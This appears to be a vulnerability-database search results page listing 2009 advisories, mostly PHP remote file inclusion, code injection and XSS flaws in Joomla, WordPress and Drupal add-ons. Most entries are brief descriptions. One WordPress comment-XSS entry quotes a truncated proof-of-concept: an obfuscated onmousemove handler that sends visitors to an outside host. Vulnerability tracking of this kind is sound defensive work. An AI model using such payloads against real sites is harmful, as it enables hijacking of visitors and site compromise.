Lucene search

7219 matches found

NVD
added 2009/07/28 7:30 p.m., 14 views

CVE-2009-2634

PHP remote file inclusion vulnerability in toolbarext.php in the MediaLibrary (commedialibrary) component 1.5.3 Basic for Joomla! allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter...

CVSS: 7.5 | AI score: 7.6 | EPSS: 0.02086
Exploits: 0 | References: 1
Cvelist
added 2009/07/28 7:6 p.m., 21 views

CVE-2009-2635

PHP remote file inclusion vulnerability in toolbarext.php in the RealEstateManager (comrealestatemanager) component 1.0 Basic for Joomla! allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter...

AI score: 7.6 | EPSS: 0.02086
Exploits: 0 | References: 1
seebug.org
added 2009/07/28 12:0 a.m., 20 views

Allomani Mobile 2.5 Remote Blind SQL Injection Exploit

No description provided by source.

AI score: 7.1
Exploits: 0
myhack58
added 2009/07/26 12:0 a.m., 13 views

iShowMusic V1.2 Write a shell vulnerability

A few days before the announcement of the vulnerability, these days quite busy, today only see. Just some time ago using this program to do a music station, in the own Station test is successful, by the way also fill the lower holes. -------- Vulnerability description: iShow Music is a basic set...

AI score: 7
Exploits: 0
Metasploit
added 2009/07/21 3:20 p.m., 55 views

TikiWiki jhot Remote Command Execution

TikiWiki contains a flaw that may allow a malicious user to execute arbitrary PHP code. The issue is triggered due to the jhot.php script not correctly verifying uploaded files. It is possible that the flaw may allow arbitrary PHP code execution by uploading a malicious PHP script resulting in a...

CVSS: 7.5 | AI score: 7.6 | EPSS: 0.42596
Exploits: 8
myhack58
added 2009/07/16 12:0 a.m., 19 views

wordpress281 comments show XSS vulnerability

Ghost boy’blog, XEYE’s blogto assist in testing. POC: the 1. In the comment URL field, fill in the 2. 3. http://blog.sohu.com/fh8e3333211134333/f8e9wjfidsj3332dfs’ onmousemove=’location. href=String. fromCharCode104,116,116,112,58,47,47,105,110,98,114,101,97,107,46,110,101,116,47,97,46,112,104,11...

AI score: 7.2
Exploits: 0
OpenVAS
added 2009/07/15 12:0 a.m., 16 views

DM FileManager <= 3.9.4 RFI Vulnerability - Active Check

DM FileManager is prone to a remote file inclusion (RFI) vulnerability.

CVSS: 6.8 | AI score: 6.7 | EPSS: 0.01689
Exploits: 0 | References: 3
NVD
added 2009/07/09 4:30 p.m., 16 views

CVE-2009-2396

PHP remote file inclusion vulnerability in template/album.php in DM Albums 1.9.2, as used standalone or as a WordPress plugin, allows remote attackers to execute arbitrary PHP code via a URL in the SECURITYFILE parameter...

CVSS: 9.3 | AI score: 7.5 | EPSS: 0.05942
Exploits: 1 | References: 3
NVD
added 2009/07/09 4:30 p.m., 22 views

CVE-2009-2399

PHP remote file inclusion vulnerability in dm-albums/template/album.php in DM FileManager 3.9.4, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the SECURITYFILE parameter...

CVSS: 6.8 | AI score: 7.5 | EPSS: 0.01689
Exploits: 0 | References: 2
Prion
added 2009/07/08 3:30 p.m., 15 views

Format string

Drupal 6.x before 6.13 does not prevent users from modifying user signatures after the associated comment format has been changed to an administrator-controlled input format, which allows remote authenticated users to inject arbitrary web script, HTML, and possibly PHP code via a crafted user...

CVSS: 6.5 | AI score: 6.9 | EPSS: 0.02308
Exploits: 0 | References: 4 | Affected Software: 1
CVE
added 2009/07/08 3:0 p.m., 46 views

CVE-2009-2371

The CVE-2009-2371 entry affects the Drupal module Advanced Forum (6.x) prior to 6.x-1.1. The issue arises when the module allows users to modify their signatures after the comment format has been switched to an administrator-controlled input format, enabling remote authenticated users to inject a...

CVSS: 6.5 | AI score: 6.8 | EPSS: 0.01142
Exploits: 0 | References: 5 | Affected Software: 1
Prion
added 2009/07/07 7:0 p.m., 26 views

Unrestricted file upload

Unrestricted file upload vulnerability in index.php in phpGreetCards 3.7 allows remote attackers to execute arbitrary PHP code by uploading a file with an executable extension, then accessing it via a link that is listed by userfiles/numbershell.php...

CVSS: 6.8 | AI score: 8 | EPSS: 0.02326
Exploits: 1 | References: 6 | Affected Software: 1
Prion
added 2009/07/05 4:30 p.m., 19 views

Code injection

Multiple static code injection vulnerabilities in CMS Chainuk 1.2 and earlier allow remote attackers to inject arbitrary PHP code (1) into settings.php via the menu parameter to adminsettings.php or (2) into a content/=NUMBER.php file via the title parameter to adminnew.php...

CVSS: 7.5 | AI score: 8 | EPSS: 0.02396
Exploits: 0 | References: 3 | Affected Software: 1
NVD
added 2009/07/05 4:30 p.m., 23 views

CVE-2009-2331

Multiple static code injection vulnerabilities in CMS Chainuk 1.2 and earlier allow remote attackers to inject arbitrary PHP code (1) into settings.php via the menu parameter to adminsettings.php or (2) into a content/=NUMBER.php file via the title parameter to adminnew.php...

CVSS: 7.5 | AI score: 7.4 | EPSS: 0.02396
Exploits: 0 | References: 3
OpenVAS
added 2009/07/03 12:0 a.m., 33 views

V-webmail Multiple PHP Remote File Inclusion Vulnerability

The host is running V-webmail and is prone to Multiple PHP Remote File Inclusion vulnerability.

CVSS: 7.5 | AI score: 0.5 | EPSS: 0.03498
Exploits: 2 | References: 3
CVE
added 2009/06/25 9:0 p.m., 36 views

CVE-2009-2218

Multiple PHP remote file inclusion vulnerabilities affect phpCollegeExchange 0.1.5c when register_globals is enabled. The flaws allow an attacker to trigger arbitrary PHP code execution by supplying a URL in the home parameter to several PHP scripts (i_head.php, i_nav.php, user_new_2.php, house/m...

CVSS: 6.8 | AI score: 7.7 | EPSS: 0.01574
Exploits: 0 | References: 2 | Affected Software: 1
Cvelist
added 2009/06/23 9:21 p.m., 15 views

CVE-2009-2182

Multiple PHP remote file inclusion vulnerabilities in Campsite 3.3.0 RC1 allow remote attackers to execute arbitrary PHP code via a URL in the GLOBALSgcampsiteDir parameter to (1) adpopup.php, (2) camphtml.php, (3) initcontent.php, (4) logout.php, (5) menu.php, and (6) set-author.php in admin-files/; (7)...

AI score: 7.6 | EPSS: 0.01723
Exploits: 0 | References: 1
Tenable Nessus
added 2009/06/23 12:0 a.m., 37 views

Acajoom Component for Joomla! <= 3.2.6 Backdoor Detection

Acajoom, a third-party component for Joomla! for managing mailing lists, newsletters, auto-responders, and other communications, is running on the remote host. This version of Acajoom is equal or prior to 3.2.6. It is, therefore, affected by a backdoor in the self.acajoom.php script. An...

AI score: 6
Exploits: 0 | References: 2
Prion
added 2009/06/22 2:30 p.m., 12 views

Remote file inclusion

PHP remote file inclusion vulnerability in firestats-wordpress.php in the FireStats plugin before 1.6.2-stable for WordPress allows remote attackers to execute arbitrary PHP code via a URL in the fsjavascript parameter...

CVSS: 7.5 | AI score: 8.1 | EPSS: 0.02819
Exploits: 0 | References: 3 | Affected Software: 1
Patchstack
added 2009/06/22 12:0 a.m., 24 views

WordPress FireStats Plugin <= 1.6.1 - Remote File Inclusion

Because of this vulnerability in firestats-wordpress.php, the attackers can execute arbitrary PHP code via a URL in the "fsjavascript" parameter. Solution Update the plugin...

CVSS: 7.5 | AI score: 6.7 | EPSS: 0.02819
Exploits: 0 | References: 1 | Affected Software: 1